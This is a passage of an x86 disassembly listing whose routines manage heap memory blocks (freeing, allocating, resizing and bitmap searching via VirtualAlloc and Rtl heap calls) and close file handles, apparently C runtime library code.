mov [ebp+var_C], ebx
jnz loc_41D36D
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_41D2F4
mov ebx, esi
loc_41D2F4: ; CODE XREF: sub_41D1F6+FA�j
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_41D306
mov edx, esi
loc_41D306: ; CODE XREF: sub_41D1F6+10C�j
cmp ebx, edx
jz short loc_41D368
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_41D350
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_41D336
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41D350
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_41D350
; ---------------------------------------------------------------------------
loc_41D336: ; CODE XREF: sub_41D1F6+127�j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41D350
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_41D350: ; CODE XREF: sub_41D1F6+11D�j
; sub_41D1F6+137�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_41D368: ; CODE XREF: sub_41D1F6+112�j
mov esi, [ebp+arg_4]
jmp short loc_41D370
; ---------------------------------------------------------------------------
loc_41D36D: ; CODE XREF: sub_41D1F6+E2�j
mov ebx, [ebp+arg_0]
loc_41D370: ; CODE XREF: sub_41D1F6+175�j
cmp [ebp+var_C], 0
jnz short loc_41D37E
cmp ebx, edx
jz loc_41D3FE
loc_41D37E: ; CODE XREF: sub_41D1F6+17E�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_41D3FE
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_41D3D5
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41D3C4
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41D3C4: ; CODE XREF: sub_41D1F6+1BE�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_41D3FE
; ---------------------------------------------------------------------------
loc_41D3D5: ; CODE XREF: sub_41D1F6+1B8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41D3EB
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41D3EB: ; CODE XREF: sub_41D1F6+1E3�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_41D3FE: ; CODE XREF: sub_41D1F6+182�j
; sub_41D1F6+1A6�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_41D509
mov eax, ds:dword_47C754
test eax, eax
jz loc_41D4FB
mov ecx, ds:dword_47C76C
mov esi, dword_4240F8
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, ds:dword_47C76C
mov eax, ds:dword_47C754
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, ds:dword_47C754
mov eax, [eax+10h]
mov ecx, ds:dword_47C76C
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, ds:dword_47C754
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, ds:dword_47C754
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_41D48C
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, ds:dword_47C754
loc_41D48C: ; CODE XREF: sub_41D1F6+28B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_41D4FB
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, ds:dword_47C754
push dword ptr [eax+10h]
push 0
push ds:dword_47C770
call dword_42419C ; RtlFreeHeap
mov eax, ds:dword_47C758
mov edx, ds:dword_47C75C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, ds:dword_47C754
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_421560
mov eax, [ebp+arg_0]
add esp, 0Ch
dec ds:dword_47C758
cmp eax, ds:dword_47C754
jbe short loc_41D4F1
sub [ebp+arg_0], 14h
loc_41D4F1: ; CODE XREF: sub_41D1F6+2F5�j
mov eax, ds:dword_47C75C
mov ds:dword_47C764, eax
loc_41D4FB: ; CODE XREF: sub_41D1F6+223�j
; sub_41D1F6+29A�j
mov eax, [ebp+arg_0]
mov ds:dword_47C754, eax
mov ds:dword_47C76C, edi
loc_41D509: ; CODE XREF: sub_41D1F6+216�j
pop ebx
loc_41D50A: ; CODE XREF: sub_41D1F6+37�j
pop edi
pop esi
leave
retn
sub_41D1F6 endp
; =============== S U B R O U T I N E =======================================
sub_41D50E proc near ; CODE XREF: sub_41D9AA+150�p
mov eax, ds:dword_47C758
mov ecx, ds:dword_47C768
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_41D554
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push ds:dword_47C75C
push edi
push ds:dword_47C770
call dword_424164 ; RtlReAllocateHeap
cmp eax, edi
jnz short loc_41D543
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_41D543: ; CODE XREF: sub_41D50E+2F�j
add ds:dword_47C768, 10h
mov ds:dword_47C75C, eax
mov eax, ds:dword_47C758
loc_41D554: ; CODE XREF: sub_41D50E+10�j
mov ecx, ds:dword_47C75C
push esi
push 41C4h
push 8
push ds:dword_47C770
lea eax, [eax+eax*4]
lea esi, [ecx+eax*4]
call dword_424198 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jnz short loc_41D57F
loc_41D57B: ; CODE XREF: sub_41D50E+9B�j
xor eax, eax
jmp short loc_41D5C2
; ---------------------------------------------------------------------------
loc_41D57F: ; CODE XREF: sub_41D50E+6B�j
push 4
push 2000h
push 100000h
push edi
call dword_4240F4 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_41D5AB
push dword ptr [esi+10h]
push edi
push ds:dword_47C770
call dword_42419C ; RtlFreeHeap
jmp short loc_41D57B
; ---------------------------------------------------------------------------
loc_41D5AB: ; CODE XREF: sub_41D50E+89�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc ds:dword_47C758
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_41D5C2: ; CODE XREF: sub_41D50E+6F�j
pop esi
pop edi
retn
sub_41D50E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D5C5 proc near ; CODE XREF: sub_41D9AA+15F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_41D5DD
; ---------------------------------------------------------------------------
loc_41D5DA: ; CODE XREF: sub_41D5C5+1A�j
shl eax, 1
inc ebx
loc_41D5DD: ; CODE XREF: sub_41D5C5+13�j
test eax, eax
jge short loc_41D5DA
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_41D5F6: ; CODE XREF: sub_41D5C5+3B�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_41D5F6
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call dword_4240F4 ; VirtualAlloc
test eax, eax
jnz short loc_41D629
or eax, 0FFFFFFFFh
jmp loc_41D6C6
; ---------------------------------------------------------------------------
loc_41D629: ; CODE XREF: sub_41D5C5+5A�j
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_41D679
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
loc_41D641: ; CODE XREF: sub_41D5C5+AF�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
dec ecx
jnz short loc_41D641
mov edx, [ebp+var_4]
loc_41D679: ; CODE XREF: sub_41D5C5+6F�j
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_41D6B6
or [eax+4], edi
loc_41D6B6: ; CODE XREF: sub_41D5C5+EC�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_41D6C6: ; CODE XREF: sub_41D5C5+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41D5C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D6CB proc near ; CODE XREF: sub_41E82C+77�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_41D86D
test bl, 1
jnz loc_41D866
add ebx, ecx
cmp esi, ebx
jg loc_41D866
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_41D740
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_41D740: ; CODE XREF: sub_41D6CB+6D�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_41D78B
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_41D76C
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41D78B
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41D78B
; ---------------------------------------------------------------------------
loc_41D76C: ; CODE XREF: sub_41D6CB+85�j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41D78B
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41D78B: ; CODE XREF: sub_41D6CB+7B�j
; sub_41D6CB+98�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_41D854
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_41D7C5
push 3Fh
pop edi
loc_41D7C5: ; CODE XREF: sub_41D6CB+F5�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_41D842
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_41D819
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41D811
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41D811: ; CODE XREF: sub_41D6CB+136�j
lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_41D839
; ---------------------------------------------------------------------------
loc_41D819: ; CODE XREF: sub_41D6CB+130�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41D82F
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41D82F: ; CODE XREF: sub_41D6CB+152�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_41D839: ; CODE XREF: sub_41D6CB+14C�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_41D842: ; CODE XREF: sub_41D6CB+11E�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_41D857
; ---------------------------------------------------------------------------
loc_41D854: ; CODE XREF: sub_41D6CB+DE�j
mov edx, [ebp+arg_4]
loc_41D857: ; CODE XREF: sub_41D6CB+187�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_41D9A2
; ---------------------------------------------------------------------------
loc_41D866: ; CODE XREF: sub_41D6CB+50�j
; sub_41D6CB+5A�j
xor eax, eax
jmp loc_41D9A5
; ---------------------------------------------------------------------------
loc_41D86D: ; CODE XREF: sub_41D6CB+47�j
jge loc_41D9A2
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_41D898
push 3Fh
pop esi
loc_41D898: ; CODE XREF: sub_41D6CB+1C8�j
test byte ptr [ebp+var_4], 1
jnz loc_41D922
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41D8B1
push 3Fh
pop esi
loc_41D8B1: ; CODE XREF: sub_41D6CB+1E1�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_41D8FB
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_41D8DC
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_41D8F8
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41D8F8
; ---------------------------------------------------------------------------
loc_41D8DC: ; CODE XREF: sub_41D6CB+1F6�j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41D8F8
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41D8F8: ; CODE XREF: sub_41D6CB+208�j
; sub_41D6CB+20F�j ...
mov ebx, [ebp+arg_4]
loc_41D8FB: ; CODE XREF: sub_41D6CB+1EC�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41D922
push 3Fh
pop esi
loc_41D922: ; CODE XREF: sub_41D6CB+1D1�j
; sub_41D6CB+252�j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41D999
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_41D970
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41D968
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_41D968: ; CODE XREF: sub_41D6CB+28D�j
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_41D990
; ---------------------------------------------------------------------------
loc_41D970: ; CODE XREF: sub_41D6CB+287�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41D986
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_41D986: ; CODE XREF: sub_41D6CB+2A9�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_41D990: ; CODE XREF: sub_41D6CB+2A3�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_41D999: ; CODE XREF: sub_41D6CB+275�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_41D9A2: ; CODE XREF: sub_41D6CB+196�j
; sub_41D6CB:loc_41D86D�j
xor eax, eax
inc eax
loc_41D9A5: ; CODE XREF: sub_41D6CB+19D�j
pop edi
pop esi
pop ebx
leave
retn
sub_41D6CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D9AA proc near ; CODE XREF: sub_419D24+2D�p
; sub_41E82C+89�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov ecx, [ebp+arg_0]
mov eax, ds:dword_47C758
mov edx, ds:dword_47C75C
add ecx, 17h
and ecx, 0FFFFFFF0h
push ebx
mov [ebp+var_10], ecx
sar ecx, 4
push esi
lea eax, [eax+eax*4]
push edi
dec ecx
cmp ecx, 20h
lea edi, [edx+eax*4]
mov [ebp+var_4], edi
jge short loc_41D9E7
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_41D9F4
; ---------------------------------------------------------------------------
loc_41D9E7: ; CODE XREF: sub_41D9AA+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_8], eax
loc_41D9F4: ; CODE XREF: sub_41D9AA+3B�j
mov eax, ds:dword_47C764
mov ebx, eax
mov [ebp+var_C], esi
cmp ebx, edi
jmp short loc_41DA16
; ---------------------------------------------------------------------------
loc_41DA02: ; CODE XREF: sub_41D9AA+6F�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41DA1B
add ebx, 14h
cmp ebx, [ebp+var_4]
loc_41DA16: ; CODE XREF: sub_41D9AA+56�j
mov [ebp+arg_0], ebx
jb short loc_41DA02
loc_41DA1B: ; CODE XREF: sub_41D9AA+64�j
cmp ebx, [ebp+var_4]
jnz short loc_41DA44
mov ebx, edx
jmp short loc_41DA35
; ---------------------------------------------------------------------------
loc_41DA24: ; CODE XREF: sub_41D9AA+90�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41DA3C
add ebx, 14h
loc_41DA35: ; CODE XREF: sub_41D9AA+78�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_41DA24
loc_41DA3C: ; CODE XREF: sub_41D9AA+86�j
cmp ebx, eax
jz loc_41DAD8
loc_41DA44: ; CODE XREF: sub_41D9AA+74�j
; sub_41D9AA+170�j
mov ds:dword_47C764, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_41DA6B
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41DAA1
loc_41DA6B: ; CODE XREF: sub_41D9AA+AB�j
mov edx, [eax+0C4h]
and edx, [ebp+var_8]
and [ebp+var_4], 0
lea ecx, [eax+44h]
mov esi, [ecx]
and esi, [ebp+var_C]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_41DA9E
loc_41DA87: ; CODE XREF: sub_41D9AA+F2�j
mov edx, [ecx+84h]
and edx, [ebp+var_8]
inc [ebp+var_4]
add ecx, 4
mov edi, [ecx]
and edi, esi
or edx, edi
jz short loc_41DA87
loc_41DA9E: ; CODE XREF: sub_41D9AA+DB�j
mov edx, [ebp+var_4]
loc_41DAA1: ; CODE XREF: sub_41D9AA+BF�j
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_41DB2A
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_41DB2A
; ---------------------------------------------------------------------------
loc_41DACC: ; CODE XREF: sub_41D9AA+131�j
cmp dword ptr [ebx+8], 0
jnz short loc_41DADD
add ebx, 14h
mov [ebp+arg_0], ebx
loc_41DAD8: ; CODE XREF: sub_41D9AA+94�j
cmp ebx, [ebp+var_4]
jb short loc_41DACC
loc_41DADD: ; CODE XREF: sub_41D9AA+126�j
cmp ebx, [ebp+var_4]
jnz short loc_41DB08
mov ebx, edx
jmp short loc_41DAEF
; ---------------------------------------------------------------------------
loc_41DAE6: ; CODE XREF: sub_41D9AA+14A�j
cmp dword ptr [ebx+8], 0
jnz short loc_41DAF6
add ebx, 14h
loc_41DAEF: ; CODE XREF: sub_41D9AA+13A�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_41DAE6
loc_41DAF6: ; CODE XREF: sub_41D9AA+140�j
cmp ebx, eax
jnz short loc_41DB08
call sub_41D50E
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_41DB20
loc_41DB08: ; CODE XREF: sub_41D9AA+136�j
; sub_41D9AA+14E�j
push ebx
call sub_41D5C5
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz loc_41DA44
loc_41DB20: ; CODE XREF: sub_41D9AA+15C�j
xor eax, eax
jmp loc_41DCA1
; ---------------------------------------------------------------------------
loc_41DB27: ; CODE XREF: sub_41D9AA+182�j
shl ecx, 1
inc edi
loc_41DB2A: ; CODE XREF: sub_41D9AA+111�j
; sub_41D9AA+120�j
test ecx, ecx
jge short loc_41DB27
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_41DB4B
push 3Fh
pop esi
loc_41DB4B: ; CODE XREF: sub_41D9AA+19C�j
cmp esi, edi
jz loc_41DC54
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41DBB7
cmp edi, 20h
mov ebx, 80000000h
jge short loc_41DB8B
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_41DBB4
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_41DBB7
; ---------------------------------------------------------------------------
loc_41DB8B: ; CODE XREF: sub_41D9AA+1B9�j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_41DBB4
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_41DBB7
; ---------------------------------------------------------------------------
loc_41DBB4: ; CODE XREF: sub_41D9AA+1D5�j
; sub_41D9AA+1FD�j
mov ebx, [ebp+arg_0]
loc_41DBB7: ; CODE XREF: sub_41D9AA+1AF�j
; sub_41D9AA+1DF�j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_41DC60
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41DC51
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_41DC28
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_41DC16
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_41DC16: ; CODE XREF: sub_41D9AA+25F�j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_41DC51
; ---------------------------------------------------------------------------
loc_41DC28: ; CODE XREF: sub_41D9AA+259�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_41DC3B
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_41DC3B: ; CODE XREF: sub_41D9AA+282�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_41DC51: ; CODE XREF: sub_41D9AA+247�j
; sub_41D9AA+27C�j
mov ecx, [ebp+var_8]
loc_41DC54: ; CODE XREF: sub_41D9AA+1A3�j
test ecx, ecx
jz short loc_41DC63
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_41DC63
; ---------------------------------------------------------------------------
loc_41DC60: ; CODE XREF: sub_41D9AA+223�j
mov ecx, [ebp+var_8]
loc_41DC63: ; CODE XREF: sub_41D9AA+2AC�j
; sub_41D9AA+2B4�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_41DC99
cmp ebx, ds:dword_47C754
jnz short loc_41DC99
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_47C76C
jnz short loc_41DC99
and ds:dword_47C754, 0
loc_41DC99: ; CODE XREF: sub_41D9AA+2D3�j
; sub_41D9AA+2DB�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_41DCA1: ; CODE XREF: sub_41D9AA+178�j
pop edi
pop esi
pop ebx
leave
retn
sub_41D9AA endp
; =============== S U B R O U T I N E =======================================
sub_41DCA6 proc near ; CODE XREF: sub_41DD29+4C�p
; sub_4222C9+2DC�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_421F0B
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41DCF4
cmp esi, 1
jz short loc_41DCC2
cmp esi, 2
jnz short loc_41DCD8
loc_41DCC2: ; CODE XREF: sub_41DCA6+15�j
push 2
call sub_421F0B
push 1
mov edi, eax
call sub_421F0B
cmp eax, edi
pop ecx
pop ecx
jz short loc_41DCF4
loc_41DCD8: ; CODE XREF: sub_41DCA6+1A�j
push esi
call sub_421F0B
pop ecx
push eax
call dword_42406C ; CloseHandle
test eax, eax
jnz short loc_41DCF4
call dword_42412C ; RtlGetLastWin32Error
mov edi, eax
jmp short loc_41DCF6
; ---------------------------------------------------------------------------
loc_41DCF4: ; CODE XREF: sub_41DCA6+10�j
; sub_41DCA6+30�j ...
xor edi, edi
loc_41DCF6: ; CODE XREF: sub_41DCA6+4C�j
push esi
call sub_421E8C
mov eax, esi
sar eax, 5
mov eax, ds:dword_47C640[eax*4]
and esi, 1Fh
test edi, edi
pop ecx
lea ecx, [esi+esi*8]
mov byte ptr [eax+ecx*4+4], 0
jz short loc_41DD24
push edi
call sub_41E697
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_41DD26
; ---------------------------------------------------------------------------
loc_41DD24: ; CODE XREF: sub_41DCA6+70�j
xor eax, eax
